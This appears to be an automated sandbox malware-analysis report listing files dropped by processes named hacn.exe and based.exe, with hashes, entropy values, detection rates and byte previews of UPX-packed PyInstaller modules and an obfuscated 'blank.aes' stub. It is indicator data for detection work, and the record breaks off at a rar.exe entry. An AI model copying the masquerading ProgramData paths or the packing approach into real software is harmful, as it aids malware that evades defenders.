SHA-512:	896CAA053F48B1E4102E0F41A7D13D932A746EEA69A894AE564EF5A84EF50890514DECA6496E915AAE40A500955220DBC1B1016FE0B8BCDDE0AD81B2917DEA8B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........]...<...<...<...I...<...Sc..<...I...<...I...<...I...<...D...<...D...<...<...=..+I../<..+I...<..+Ia..<..+I...<..Rich.<..........................PE..d.....,d.........." .....V#..v!...............................................E.....".D...`.........................................`.<.....@.=.\|.....D......`B.......C../....D..t....$.T...........................P.$.8............p#.8............................text...bT#......V#................. ..`.rdata...B...p#..D...Z#.............@..@.data... .....=.......=.............@....pdata.......`B......HA.............@..@PyRuntim`....pD......VC.............@....rsrc.........D......ZC.............@..@.reloc...t....D..v...dC.............@..B........................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe

Download File

Process:	C:\ProgramData\Microsoft\hacn.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	6361390
Entropy (8bit):	7.989449982411625
Encrypted:	false
SSDEEP:	196608:S8JwSNEMZM/LUuL/VLdu4IDrrp9ECJqIrE:S4jEMeIqd6DrrDLJNE
MD5:	E5DB23B3AAF4DDDD2BAF96FB7BBA9616
SHA1:	B4479AB38BB534CE5BBF9C6F3C89305BDCFF2CF7
SHA-256:	93BDF29408BE9CF5C1880F897F91CD475824E46B929CD947F32B8808A5903958
SHA-512:	541436C704D8789DAD962841B985EB84C251F5FAC7AD93DD318BC91A2C29885947F8D35AC99C03B3C3D6EC81D03AD25E01F85406F8F86BF05BD2D30244CE51DB
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I.>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I.=>...I..=>..Rich<>..........PE..L..... b............................0........0....@..........................`............@.........................p...4.......P....@..P....................0..<#......T............................U..@............0..x....... ....................text............................... ..`.rdata.......0....... ..............@..@.data... G..........................@....didat.......0......................@....rsrc...P....@......................@..@.reloc..<#...0...$..................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI66162\select.pyd

Download File

Process:	C:\ProgramData\Microsoft\hacn.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	29976
Entropy (8bit):	6.627859470728624
Encrypted:	false
SSDEEP:	768:gUC2hwhVHqOmEVILQG35YiSyvrYPxWEl6:FC2ehVKOmEVILQGp7SyEPxe
MD5:	A653F35D05D2F6DEBC5D34DADDD3DFA1
SHA1:	1A2CEEC28EA44388F412420425665C3781AF2435
SHA-256:	DB85F2F94D4994283E1055057372594538AE11020389D966E45607413851D9E9
SHA-512:	5AEDE99C3BE25B1A962261B183AE7A7FB92CB0CB866065DC9CD7BB5FF6F41CC8813D2CC9DE54670A27B3AD07A33B833EAA95A5B46DAD7763CA97DFA0C1CE54C9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........!.F.O.F.O.F.O.O...D.O...N.D.O...J.M.O...K.N.O...L.B.O...N.D.O.F.N...O...N.C.O...B.G.O...O.G.O....G.O...M.G.O.RichF.O.................PE..d.....,d.........." .........0......................................................;\....`.........................................`@..L....@..x....p.......`.......F.../......H....2..T............................2..8............0...............................text............................... ..`.rdata.......0......................@..@.data........P.......4..............@....pdata.......`.......6..............@..@.rsrc........p.......:..............@..@.reloc..H............D..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI66162\unicodedata.pyd

Download File

Process:	C:\ProgramData\Microsoft\hacn.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1123608
Entropy (8bit):	5.3853088605790385
Encrypted:	false
SSDEEP:	12288:6mwlRMmuZ63NTQCb5Pfhnzr0ql8L8kcM7IRG5eeme6VZyrIBHdQLhfFE+uQfk:ulRuUZV0m8UMMREtV6Vo4uYQfk
MD5:	81D62AD36CBDDB4E57A91018F3C0816E
SHA1:	FE4A4FC35DF240B50DB22B35824E4826059A807B
SHA-256:	1FB2D66C056F69E8BBDD8C6C910E72697874DAE680264F8FB4B4DF19AF98AA2E
SHA-512:	7D15D741378E671591356DFAAD4E1E03D3F5456CBDF87579B61D02A4A52AB9B6ECBFFAD3274CEDE8C876EA19EAEB8BA4372AD5986744D430A29F50B9CAFFB75D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........$z.eJ).eJ).eJ)...).eJ)..K(.eJ)..O(.eJ)..N(.eJ)..I(.eJ)\|.K(.eJ)..K(.eJ).eK).eJ)\|.G(.eJ)\|.J(.eJ)\|..).eJ)\|.H(.eJ)Rich.eJ)........................PE..d.....,d.........." .....B.......... *.......................................@......Q.....`.............................................X............ ..........H......../...0.......`..T........................... a..8............`..x............................text...9A.......B.................. ..`.rdata.......`.......F..............@..@.data...............................@....pdata..H...........................@..@.rsrc........ ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI66642\VCRUNTIME140.dll

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	98224
Entropy (8bit):	6.452201564717313
Encrypted:	false
SSDEEP:	1536:ywqHLG4SsAzAvadZw+1Hcx8uIYNUzUoHA4decbK/zJNuw6z5U:ytrfZ+jPYNzoHA4decbK/FNu51U
MD5:	F34EB034AA4A9735218686590CBA2E8B
SHA1:	2BC20ACDCB201676B77A66FA7EC6B53FA2644713
SHA-256:	9D2B40F0395CC5D1B4D5EA17B84970C29971D448C37104676DB577586D4AD1B1
SHA-512:	D27D5E65E8206BD7923CF2A3C4384FEC0FC59E8BC29E25F8C03D039F3741C01D1A8C82979D7B88C10B209DB31FBBEC23909E976B3EE593DC33481F0050A445AF
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*..qn.."n.."n.."...#l.."g.."e.."n.."B.."<..#c.."<..#~.."<..#q.."<..#o.."<.g"o.."<..#o.."Richn.."................PE..d...%\|.a.........." .........`......p................................................{....`A.........................................B..4....J...............p..X....X...'..........h,..T............................,..8............................................text............................... ..`.rdata...@.......B..................@..@.data...@....`.......@..............@....pdata..X....p.......D..............@..@_RDATA...............P..............@..@.rsrc................R..............@..@.reloc...............V..............@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI66642\_bz2.pyd

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	46064
Entropy (8bit):	7.796865894568779
Encrypted:	false
SSDEEP:	768:V3CnjEFEHH57WfWzAPpIe7zOsupVPW9zxtrXhcwKnXffpI3IvtVHeDYiSyv6RqeA:V6jEFO7WffITsMw9vrxcpnPq3IvtVHs9
MD5:	C24B301F99A05305AC06C35F7F50307F
SHA1:	0CEE6DE0EA38A4C8C02BF92644DB17E8FAA7093B
SHA-256:	C665F60B1663544FACF9A026F5A87C8445558D7794BAFF56E42E65671D5ADC24
SHA-512:	936D16FEA3569A32A9941D58263E951623F4927A853C01EE187364DF95CD246B3826E7B8423AC3C265965EE8E491275E908AC9E2D63F3ABC5F721ADD8E20F699
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........>..m..m..m..=m..m...l..m..Sm..m...l..m...l..m...l..mf..l..mt..l..m..m..mf..l..mf..l..mf.Qm..mf..l..mRich..m........................PE..d....(.b.........." .................b....................................................`..........................................{..H....y.......p....... ..,............{.......................................n..8...........................................UPX0....................................UPX1................................@....rsrc........p......................@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI66642\_ctypes.pyd

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	56816
Entropy (8bit):	7.830032396611692
Encrypted:	false
SSDEEP:	1536:z4eSBuhlC82gmmCm7jDCxU6esTzvIvQPnY7Syp96:kPAH4gZT7qxU6vTbIvQPnYv96
MD5:	5C0BDA19C6BC2D6D8081B16B2834134E
SHA1:	41370ACD9CC21165DD1D4AA064588D597A84EBBE
SHA-256:	5E7192C18AD73DAA71EFADE0149FBCAF734C280A6EE346525EA5D9729036194E
SHA-512:	B1B45FCBB1E39CB6BA7AC5F6828EE9C54767EABEEDCA35A79E7BA49FD17AD20588964F28D06A2DCF8B0446E90F1DB41D3FCA97D1A9612F6CC5EB816BD9DCDF8A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........R...3c..3c..3c..K...3c..Fb..3c..Ff..3c..Fg..3c..F`..3c..Fb..3c..Ag..3c..Ab..3c.HZb..3c..3b.:3c..Fn..3c..Fc..3c..F...3c..Fa..3c.Rich.3c.........PE..d....(.b.........." .............p...........................................@............`.........................................H<.......9.......0.......................<.......................................&..8...........................................UPX0.....p..............................UPX1................................@....rsrc........0......................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI66642\_decimal.pyd

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	105456
Entropy (8bit):	7.934837610567248
Encrypted:	false
SSDEEP:	1536:oLDiGfp+9JSNhsyzp72hnyE8E24ZllDUD1RPC/J3KPKu8URMIv5q5pM7SyqL:owcV0nyE32kvDUhRa1uHqIv5q5pMsL
MD5:	604154D16E9A3020B9AD3B6312F5479C
SHA1:	27C874B052D5E7F4182A4EAD6B0486E3D0FAF4DA
SHA-256:	3C7585E75FA1E8604D8C408F77995B30F90C54A0F2FF5021E14FA7F84E093FB6
SHA-512:	37CE86FD8165FC51EBE568D7CE4B5EA8C1598114558D9F74A748A07DC62A1CC5D50FE1448DDE6496EA13E45631E231221C15A64CEBBB18FA96E2F71C61BE0DB4
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........8...V...V...V......V..W...V..S...V..R...V..U...V.a.W...V.s.W...V...W.;.V.a.U...V.a.[...V.a.V...V.a.....V.a.T...V.Rich..V.........PE..d...q(.b.........." .....p................................................... ............`.............................................P........................'......................................................8...........................................UPX0....................................UPX1.....p.......f..................@....rsrc................j..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI66642\_hashlib.pyd

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	33264
Entropy (8bit):	7.645283646866556
Encrypted:	false
SSDEEP:	768:rzmfA5r8DJk6cG5pq+Iv5IiyYiSyvUqbIteE+K:rzmG8DJkV+Iv5Iiy7Syif
MD5:	8BA5202E2F3FB1274747AA2AE7C3F7BF
SHA1:	8D7DBA77A6413338EF84F0C4DDF929B727342C16
SHA-256:	0541A0028619AB827F961A994667F9A8F1A48C8B315F071242A69D1BD6AEAB8B
SHA-512:	D19322A1ABA0DA1AA68E24315CDBB10D63A5E3021B364B14974407DC3D25CD23DF4FF1875B12339FD4613E0F3DA9E5A78F1A0E54FFD8360ED764AF20C3ECBB49
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........SQ..2?..2?..2?..J...2?.G>..2?.G:..2?.G;..2?.G<..2?.+G>..2?.9@>..2?.jK>..2?..2>.l2?.+G2..2?.+G?..2?.+G...2?.+G=..2?.Rich.2?.........PE..d....(.b.........." .....P..........p/.......................................P............`..........................................K..P....I.......@.......................K......................................p;..8...........................................UPX0....................................UPX1.....P.......N..................@....rsrc........@.......R..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI66642\_lzma.pyd

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	84976
Entropy (8bit):	7.919746609337062
Encrypted:	false
SSDEEP:	1536:fZ6by758mldpnwpd+cjwZaO4jA5e0RBcS8iGyfo0Dm8wIve1M77Syi7:v7HdSpd+co4AhRiXT0DiIve1M7c7
MD5:	215ACC93E63FB03742911F785F8DE71A
SHA1:	D4E3B46DB5D4FCDD4F6B6874B060B32A4B676BF9
SHA-256:	FFDBE11C55010D33867317C0DC2D1BD69F8C07BDA0EA0D3841B54D4A04328F63
SHA-512:	9223A33E8235C566D280A169F52C819A83C3E6FA1F4B8127DDE6D4A1B7E940DF824CCAF8C0000EAC089091FDE6AE89F0322FE62E47328F07EA92C7705ACE4A72
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........l.C...C...C...J..G.......A.......H.......K.......@......@......A...C...&......y......B......B......B...RichC...........................PE..d....(.b.........." ..... ................................................................`.........................................4...L....................@..........................................................8...........................................UPX0....................................UPX1..... ..........................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI66642\_queue.pyd

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	23536
Entropy (8bit):	7.403882539076591
Encrypted:	false
SSDEEP:	384:PVOBO+iv3GmArtK6qsriOU3c4KFPsZa7gJXxeMIv7UiNqIYiSy1pCQe9g4i/8E9x:dOa1OtK/sriO2Q0phlIv7UixYiSyvcgB
MD5:	7B9F914D6C0B80C891FF7D5C031598D9
SHA1:	EF9015302A668D59CA9EB6EBC106D82F65D6775C
SHA-256:	7F80508EDFF0896596993BF38589DA38D95BC35FB286F81DF361B5BF8C682CAE
SHA-512:	D24C2FF50649FE604B09830FD079A6AD488699BB3C44EA7ACB6DA3F441172793E6A38A1953524F5570572BD2CF050F5FEE71362A82C33F9BB9381AC4BB412D68
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........a............................................C......Q............C......C......C......C......Rich............................PE..d...r(.b.........." .....0................................................................`.............................................L.......P............`..............<...........................................8...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI66642\_socket.pyd

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	40944
Entropy (8bit):	7.702142071966167
Encrypted:	false
SSDEEP:	768:5p4KUJsCditRTP+g7X1eloezpnmhclAka9TdTsGW9Vm0NpDrZIvQwHmAYiSyveDd:5pghditRD+gReloMpnmaydTjWfbrZIvY
MD5:	1F7E5E111207BC4439799EBF115E09ED
SHA1:	E8B643F19135C121E77774EF064C14A3A529DCA3
SHA-256:	179EBBE9FD241F89DF31D881D9F76358D82CEDEE1A8FB40215C630F94EB37C04
SHA-512:	7F8A767B3E17920ACFAAFD4A7ED19B22862D8DF5BDF4B50E0D53DFBF32E9F2A08F5CDE97ACECB8ABF8F10FBBEDB46C1D3A0B9EB168D11766246AFE9E23ADA6FD
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Rv...............ok.....Db......Db......Db......Db.......b...............e.......b.......b.......b.......b......Rich............PE..d....(.b.........." .....p...........k....................................................`.............................................P.......h............ ..<...........X........................................w..8...........................................UPX0....................................UPX1.....p.......j..................@....rsrc................n..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI66642\_sqlite3.pyd

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	48624
Entropy (8bit):	7.7486730117609754
Encrypted:	false
SSDEEP:	768:rmDbO/i0hrNkEQ2UOiUgc7T1S/lod9VmpMSIKGJaIv32wmMRnW/qb4NC1jTNpMPD:rmDboi0hKErTSAVmeAoaqmMREUcCZT4D
MD5:	E5111E0CB03C73C0252718A48C7C68E4
SHA1:	39A494EEFECB00793B13F269615A2AFD2CDFB648
SHA-256:	C9D4F10E47E45A23DF9EB4EBB4C4F3C5153E7977DC2B92A1F142B8CCDB0BB26B
SHA-512:	CC0A00C552B98B6B80FFA4CD7CD20600E0E368FB71E816F3665E19C28BA9239FB9107F7303289C8DB7DE5208AAEF8CD2159890996C69925176E6A04B6BECC9B1
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......N.V/..8\|..8\|..8\|...\|..8\|X.9}..8\|l..\|..8\|X.=}..8\|X.<}..8\|X.;}..8\|.9}..8\|.9}..8\|..9\|..8\|.5}..8\|.8}..8\|..\|..8\|.:}..8\|Rich..8\|........PE..d....(.b.........." .............0......@................................................`.............................................P.......4............P..............(...........................................8...........................................UPX0.....0..............................UPX1.........@......................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI66642\_ssl.pyd

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	60912
Entropy (8bit):	7.835134717497924
Encrypted:	false
SSDEEP:	1536:4d+C+aTcxwivPlbXhef/o+K/l8/yyajCOGIvt7Mpv7SyCnF2:N1aAxwivPlL+Kt8IOnIvt7MVoF2
MD5:	A65B98BF0F0A1B3FFD65E30A83E40DA0
SHA1:	9545240266D5CE21C7ED7B632960008B3828F758
SHA-256:	44214A85D06628EB3209980C0F2B31740AB8C6EB402F804816D0DAE1EC379949
SHA-512:	0F70C2722722EB04B0B996BBAF7129955E38425794551C4832BAEC8844CDE9177695D4045C0872A8FB472648C62C9BD502C9240FACCA9FB469F5CBACBE3CA505
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.X..X..X..Q..^....+.Z..../.T......P....).[....+.Z....+.\..X.+....+._....'.Z.....Y......Y....(.Y..RichX..........PE..d....(.b.........." ................`.....................................................`.........................................p...d....................P......................................................p...8...........................................UPX0....................................UPX1................................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI66642\base_library.zip

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	879899
Entropy (8bit):	5.683242093964832
Encrypted:	false
SSDEEP:	12288:EEHYKmIBWSxC6SacYgCA4a2Y80dqVwxffpEo4pJSLMNmQ:EEHYI1x1La2jpVwxffpEo40MNmQ
MD5:	D9A88C1228ECC6BDEE15AB1D8250B9F1
SHA1:	DD8F8DDE1AB2E05AEBCE3CB0B99C0B380AA3592C
SHA-256:	9DB062EEFFE2028281730237AAFD9401C7AAD3ECC781905E9539F1FF41114989
SHA-512:	FA8189705E42AD08CE50225F4545A1FF8D24BCF2E026F2F66B1CABE8FF697F5DEEDBA31A8C93E5D6988AACC78A3CDD5F29D383E34F821EFADACFAD3299E0E408
Malicious:	false
Preview:	PK..........!..0.............._collections_abc.pyco....................................@.......d.Z.d.d.l.m.Z.m.Z...d.d.l.Z.e.e.e.....Z.e.d...Z.d.d...Z.e.e...Z.[.g.d...Z.d.Z.e.e.d.....Z.e.e.e.......Z.e.e.i.........Z.e.e.i.........Z.e.e.i.........Z.e.e.g.....Z.e.e.e.g.......Z.e.e.e.d.......Z.e.e.e.d.d.>.......Z.e.e.e.......Z.e.e.d.....Z e.e.d.....Z!e.e.e"......Z#e.i.......Z$e.i.......Z%e.i.......Z&e.e.j'..Z(e.d.d.......Z)d.d...Ze..Ze.e..Z+e.,....[d.d...Z-e-..Z-e.e-..Z.[-d.d...Z/G.d.d...d.e.d...Z0G.d.d...d.e.d...Z1G.d.d...d.e1..Z2e2.3e+....G.d.d...d.e.d...Z4G.d.d ..d e4..Z5G.d!d"..d"e5..Z6e6.3e.....G.d#d$..d$e.d...Z7G.d%d&..d&e7..Z8e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e ....e8.3e!....e8.3e#....G.d'd(..d(e7..Z9G.d)d..de8..Z:e:.3e)....G.d+d,..d,e.d...Z;G.d-d...d.e.d...Z<G.d/d0..d0e;e7e<..Z=G.d1d2..d2e...Z>d3d4..Z?d5d6..Z@d7d8..ZAG.d9d:..d:e.d...ZBG.d;d<..d<e=..ZCeC.3eD....G.d=d>..d>eC..ZEeE.3e.....G.d?d@..d@e=..ZFeF

C:\Users\user\AppData\Local\Temp\_MEI66642\blank.aes

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	61432
Entropy (8bit):	7.707249710720783
Encrypted:	false
SSDEEP:	1536:i3tD2NmQARFCEdQ3pj2nZFq+6oO3TUPt+0GgHL75zLv:i3ZImRF9+inZFr6oB/GelLv
MD5:	7C28DD19EF44B3A823688161B08276E7
SHA1:	E1AC9AB4E6C481A2F8E035FB79BCD8C22E359226
SHA-256:	464C3238400D4344082DE1DEC14C6A0CB724A7E82D03DC5734BD973F3B420E66
SHA-512:	FC04F56ABE187601E6A03AE339C838BC903E942A8F309B475EF26EF0D86D4B2704D8BF07E22BEC04E5D7D739F622F0A52E82C68A24B182F19873226AEBDA560E
Malicious:	false
Preview:	PK........]..X)>f.............stub-o.pyco.......R..f.........................@...sl...e.e.e.e.g.d...........e.g.d...........e.g.d.............Z.e.e.e.e.g.d...........e.g.d...........e.g.d.............Z.e.e.e.e.g.d...........e.g.d...........e.g.d.............Z.e.e.e.e.g.d...........e.g.d...........e.g.d.............Z.d.d...Z.d.Z.e.e.e.e.e.g.d...........e.g.d...........e.g.d.............e.e.e.g.d...........e.g.d...........e.g.d.............e...Z.z.e.e.e.e.e.g.d...........e.g.d...........e.g.d.............e.e.e.g.d...........e.g.d...........e.g.d.............e.e.e.e.e.e.g.d...........e.g.d...........e.g.d.............e.e.e.g.d...........e.g.d...........e.g.d.............e.e...........pie.e.e.e.e.g.d...........e.g.d...........e.g.d.............e.e.e.g.d...........e.g.d...........e.g.d.............d.....W.nA..e.e.e.e.e.g.d...........e.g.d...........e.g.d.............e.e.e.g.d...........e.g.d...........e.g.d...............y.......Y.n.w.G.d.d...d...Z.d.S.)....b....a....s....e....6....4.....r.

C:\Users\user\AppData\Local\Temp\_MEI66642\libcrypto-1_1.dll

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1105816
Entropy (8bit):	7.937977313955466
Encrypted:	false
SSDEEP:	24576:Uk3UseOkUaIS1Ufk9yI9EBrXvkKTfropEOdo89kASpQY32Za1CPwDv3uFfJW:Uk3U0aIS1Uc9yoEZlTfMpE9lT1CPwDvX
MD5:	3CC020BACEAC3B73366002445731705A
SHA1:	6D332AB68DCA5C4094ED2EE3C91F8503D9522AC1
SHA-256:	D1AA265861D23A9B76F16906940D30F3A65C5D0597107ECB3D2E6D470B401BB8
SHA-512:	1D9B46D0331ED5B95DDA8734ABE3C0BD6F7FB1EC9A3269FEAB618D661A1644A0DC3BF8AC91778D5E45406D185965898FE87ABD3261A6F7F2968C43515A48562C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........R.m.R.m.R.m.[...@.m.0.l.P.m.0.h.^.m.0.i.Z.m.0.n.V.m.R.l..m..l.Y.m...n.O.m...i.+.m...m.S.m....S.m...o.S.m.RichR.m.........................PE..d...`.0b.........." ..............&.`D5...&..................................p7...........`......................................... h5......c5.h....`5......p2.8............h7.....................................xP5.@...........................................UPX0......&.............................UPX1..........&.....................@....rsrc........`5.....................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI66642\libffi-7.dll

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	24088
Entropy (8bit):	7.527291720504194
Encrypted:	false
SSDEEP:	384:hRZBxuj5W4IBzuU2CUvOEvba4Za7gJXkrZRCXEpnYPLxDG4y80uzFLhHj:rwlGuUm2Evb1p07pWDG4yKRF
MD5:	6F818913FAFE8E4DF7FEDC46131F201F
SHA1:	BBB7BA3EDBD4783F7F973D97B0B568CC69CADAC5
SHA-256:	3F94EE4F23F6C7702AB0CC12995A6457BF22183FA828C30CC12288ADF153AE56
SHA-512:	5473FE57DC40AF44EDB4F8A7EFD68C512784649D51B2045D570C7E49399990285B59CFA6BCD25EF1316E0A073EA2A89FE46BE3BFC33F05E3333037A1FD3A6639
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6.3.r}]Ar}]Ar}]A{..Ap}]A .\@p}]A..\@q}]Ar}\AU}]A .X@~}]A .Y@z}]A .^@q}]A..Y@t}]A..^@s}]A..]@s}]A.._@s}]ARichr}]A........................PE..d......].........." .....@................................................................`.........................................................................................................................................................................UPX0....................................UPX1.....@.......:..................@...UPX2.................>..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI66642\libssl-1_1.dll

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	205216
Entropy (8bit):	7.9213750503510605
Encrypted:	false
SSDEEP:	3072:z4A92MK5MfGhqR1qnW/Bby+h0lE4GIp8/Mgfg68oPrRHUy1oygvaO9JSj8Hrd+/g:lSMehqKnEKlEARNYRP1lgl9jHrw/BgX
MD5:	7F77A090CB42609F2EFC55DDC1EE8FD5
SHA1:	EF5A128605654350A5BD17232120253194AD4C71
SHA-256:	47B63A9370289D2544ABC5A479BFB27D707AE7DB4F3F7B6CC1A8C8F57FD0CF1F
SHA-512:	A8A06A1303E76C76D1F06B689E163BA80C1A8137ADAC80FAB0D5C1C6072A69D506E0360D8B44315EF1D88CBD0C9AC95C94D001FAD5BC40727F1070734BBBBE63
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......{.T.?.:.?.:.?.:.6f..3.:.]f;.=.:..l;.=.:.]f?.3.:.]f>.7.:.]f9.;.:..g;.<.:.?.;...:..g>...:..g:.>.:..g.>.:..g8.>.:.Rich?.:.........PE..d.....0b.........." .........P...P..@....`...................................p............`..........................................&..4@...#....... ..........\|M...........f......................................@...@...........................................UPX0.....P..............................UPX1.........`......................@....rsrc....P... ...H..................@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI66642\python310.dll

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1507312
Entropy (8bit):	7.992414868541998
Encrypted:	true
SSDEEP:	24576:crd6K1Bo1WfBpYjgE47pPsk1mEbFz9S/s/owvzjN1Qf4xsb+hnj3NhpRodki1X:dK1OWfBpYjjopXtBzY/s/oohjsbenj3w
MD5:	B93EDA8CC111A5BDE906505224B717C3
SHA1:	5F1AE1AB1A3C4C023EA8138D4B09CBC1CD8E8F9E
SHA-256:	EFA27CD726DBF3BF2448476A993DC0D5FFB0264032BF83A72295AB3FC5BCD983
SHA-512:	B20195930967B4DC9F60C15D9CEAE4D577B00095F07BD93AA4F292B94A2E5601D605659E95D5168C1C2D85DC87A54D27775F8F20EBCACF56904E4AA30F1AFFBA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........U...4...4...4...A...4...[n..4...A...4...A...4...A...4...L...4...F...4...4...5...A...4...A...4...Al..4...A...4..Rich.4..........................PE..d...\(.b.........." .............P/..XE..`/..................................PF...........`...........................................E......yE.d....pE......PB.h............@F......................................dE.8...........................................UPX0.....P/.............................UPX1.........`/.....................@....rsrc........pE.....................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI66642\rar.exe

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
